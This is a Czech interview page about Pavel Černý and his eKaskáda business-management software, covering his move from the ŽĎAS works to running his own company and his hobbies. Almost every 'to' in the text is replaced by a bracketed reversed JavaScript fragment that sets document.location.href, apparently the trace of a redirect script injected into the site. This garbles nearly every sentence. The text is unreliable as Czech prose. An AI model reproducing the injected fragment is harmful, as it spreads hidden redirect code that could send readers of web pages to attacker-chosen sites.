Rainbow page separator

PODNIKATELSKÝ PŘÍBĚH – Pavel ČERNÝ

Pondělí, 12. října 2020

Pavel Černý pochází z Havlíčkova Brodu, ale na Žďársku je známý jako fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tograf, amatérský hudebník, cyklista, programá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor, analytik, vývojář a také majitel firmy, která již 30 let vyvíjí a dodává komplexní software pro řízení podniku. Výsledný produkt, systém eKaskáda, usnadňuje řízení a správu s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovkám firem v celé republice.

Jak jste se dostal k vývoji software?
Začal jsem strojní průmyslovkou, specializace regulační technika, následovalo ČVUT v Praze – také strojařina. Počítače byly v plenkách, přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jsem se dostal k programování – sálový počítač a děrné pásky, dálnopisy, na kterých se psal zdrojový kód programu. Pracovat jsem po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom začal ve ŽĎASu v konstrukční kanceláři u rýsovacího prkna. V té době tam vznikalo oddělení technických výpočtů, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože jsem byl mladý a nikdo ze starších kolegů se k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu moc neměl, stal se ze mě takový „styčný důs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojník“, který obě oddělení spojoval a „fušoval“ do programování. Nakonec můj bezvadný šéf Jan Aldorf naznal, že lépe mi bude v oddělení technického vývoje, kde se řešily všechny počítačové záleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti.

Proč jste se rozhodl začít podnikat a jaké byly začátky?
Poté, co se tady v osmdesátém devátém roce uvolnily poměry, jsem o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom začal přemýšlet poměrně rychle. Byl jsem vždy spíš ten, který věci nějakým způsobem aktivuje, než by čekal, kam ho kdo postaví. Ve ŽĎASe jsem měl na starost řadu různých úkolů, mimo jiné jsem se staral o počítačové vybavení.
Spouštěčem odchodu byl nákup počítačové myši. Věděl jsem, že stačí dojít do Nádražní ulice, kde začínal fungovat Compas, a tam ji koupit. Ale v rámci ŽĎASu [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to byl asi čtrnáctidenní administrativní proces s nejistým výsledkem. A v ten moment jsem si řekl, že takhle už fungovat nechci. V té době jsem už ve svém volnu učil podnikatele pracovat s počítačem, měl jsem na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to založenou živnost.

Jak [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to prožívala rodina, když jste se v roce 1990 rozhodl začít podnikat v oboru, který byl doslova v plenkách?
Pro manželku byl můj odchod ze ŽĎASu šok. Měli jsme dvě malé děti, a já koupil svůj první počítač za 53 tisíc, když tehdejší plat se pohyboval kolem tří tisíc korun. Něco jsme měli našetřeno, něco jsem si půjčil. Žena dodnes vzpomíná, jak tehdy přemýšlela, jestli může koupit dětem punčocháče, anebo jestli má ještě měsíc počkat.

Jaká byla vaše první významnější zakázka?
Byla [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to spolupráce s panem Alešem Neumanem. Jako začínající podnikatel za mnou přišel, že potřebuje využít počítač a potřebuje někoho, kdo mu s tím pomůže. Chtěl i software, který mu bude řešit nákupy, sklady, úč[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování a podobně, nic takového ale tehdy neexis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovalo. Nesměle jsem řekl, že mě baví programování a že bych do [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho šel, pokud by software mohly používat i další firmy. Souhlasil, domluvili jsme si cenu deset tisíc korun, což byly tři měsíční platy, a začali jsme na software pracovat. Já programoval a on byl konzultantem, který říkal, jak si [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jako podnikatel představuje. Byl [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to velice vlídný a příjemný člověk a pomohl mi určit směr dalšího podnikání. Po vzniklém software byla velká poptávka. V průběhu pěti let jsme prodali asi 800 licencí po celé republice.

Jaký byl další vývoj?
Ten první systém byl DOSovskou aplikací, která si kladla za cíl poskytnout malé či střední firmě vše, co potřebuje k provozu. Od objednávání, záznamu různých informací, přes skladové agendy, evidenci majetku a dalších nezbytností včetně účetnictví. Během let se však technologie měnily, museli jsme na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to reagovat. V roce 2000 jsme začali s vývojem zcela nové generace software, trvalo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to asi pět let. Stále nás živí a jsme na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to hrdí.

Proč má software název eKaskáda?
Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože do značné míry vnímáme informace a procesy ve firmě jako takovou kaskádu. Všechno se vším souvisí, informace se posouvají „z patra do patra“, jedno navazuje na druhé …

Co je hlavním přínosem pro uživatele?
Snadná práce se všemi informacemi, zamezení jakýchkoli duplicit dat, au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatické propojení souvisejících informací. Počínaje komunikací se zákazníky, dodavateli, uvnitř firmy, přes logistiku, marketingové a obchodní aktivity, skladové i majetkové agendy, obchodní procesy, cenotvorbu, vztahy se zákazníky a realizace prodeje, až po účetnictví, mzdy a výkazy, ať už v papírové či elektronické podobě, a s vazbami na všechny elektronické rejstříky, které k firemnímu styku patří.

Pro jaké firmy je eKaskáda určena prioritně?
Jsou [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to firmy, které se trápí s mnoha nesourodými software aplikacemi. Část informací mají v „účetním systému“, další informace v individuálních e-mailových schránkách, další v kupě excelových tabulek, dokumenty rozptýlené v různých složkách atd. V eKaskádě mohou mít vše v jedné aplikaci s veškerými výhodami plynoucími z propojení souvisejících dat.

Jak spolu v eKaskádě uživatelé ve firmě komunikují?
Neposílají si e-maily, ale „podávají si“ informace, které potřebují prostřednictvím inboxu, ten má mnohem širší využití, než lidé běžně očekávají. Když chci říct kolegovi „tuhle zakázku budeš mít na starosti ty“, tak mu neposílám e-mail ani mu nepokládám na stůl lístek s číslem zakázky, ale kliknutím na tlačítko mu zakázku pošlu do inboxu. On jí kliknutím otevře a může s ní pracovat. Informace o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom je také au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomaticky zaznamenána do „his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie“.

Jak si myslíte, že vás vnímají firmy a lidé v okolí?
Podle mé zkušenosti má, bohužel, většina lidí pocit, že opravdu kvalitní software vzniká v Brně, v Praze, ve firmách, které mají reklamy na billboardech, ale ne u jejich souseda. Není [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pravda, provoz našeho systému ve s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovkách firem nám umožňuje srovnání a vedeme si dobře. Spolupráce s místní firmou je výhodná i v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, že jsme si prostě blízko. A pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože nejsme velký podnik, se zákazníky fungujeme na úzké osobní bázi a v případě individuální úpravy software jsme mnohem pružnější než velké firmy. Pokud jsme někoho zaujali, byl bych rád, kdyby se ozval a přišel si s námi popovídat, co ho v jeho firmě trápí, a třeba se podívat, jak se dají věci dělat jinak a lépe. Setkání neznamená závazek koupit si software, ale poznat se, seznámit a hledat cestu. 

Čemu se věnujete ve svém volném čase?
Těší mě hlavně outdoorové aktivity – turistika, hory, kolo, loď, prostě být venku, [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to všechno spojené s focením. Fotit jsem začal už v dětství díky tá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovi, v poslední době jsem se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu zase začal více věnovat, mj. jsem se začlenil do [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toklubvysocina.weebly.com/“ target=“_blank“ rel=“noopener“>Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toklubu Vysočina, kde jsem se poznal s řadou fajn lidí. Baví mě také hudba, amatérsky hraji na kytaru, dobře je mi v muzikantských komunitách, třeba Žďárské interference nebo Horácká muzika.

Máte nějaké mot[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, kterým se řídíte?
Co dělám, [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dělám rád, a snažím se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dělat naplno a dobře. Snažím se dostát všemu, co jsem slíbil, i když [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pak může být pro mne nevýhodné. Vždy se snažím najít schůdnou cestu, nevzdávat [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to a jít dopředu.                                                                     (pm)

Pavel Černý – počítačové služby
nám. Republiky 75/2, Žďár n. S.
606 655 266 www.ekaskada.cz

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama/“ target=“_blank“ rel=“noopener noreferrer“>Martin Halama